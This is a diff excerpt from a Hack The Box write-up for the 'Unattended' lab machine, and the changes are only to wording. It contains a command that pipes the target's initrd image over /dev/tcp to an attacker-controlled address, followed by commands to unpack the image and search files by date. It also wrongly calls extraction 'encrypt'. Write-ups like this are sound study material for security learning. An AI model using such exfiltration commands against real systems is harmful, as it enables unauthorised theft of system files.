Kyuu-Ji/htb-write-up/unattended/write-up-unattended.md

 On box: cat /boot/initrd.img-4.9.0-8-amd64 > /dev/tcp/10.10.14.4/80
 ```

-It is a **gzip** compressed file that we encrypt like this:
+It is a **gzip** compressed file that we can encrypt:
 ```markdown
 zcat initrd.img | cpio -idmv
 ```

 And now we get a file structure from a / folder.
-We should narrow our target down by looking for files between the creation date  of the SSL file (19-12-2018) and two days forward:
+We should narrow our target down by looking for files between the creation date  of the SSL file (19-12-2018) and two days after:
 ```markdown
 find . -type f -newermt 2018-12-19 ! -newermt 2018-12-21 -ls
 ```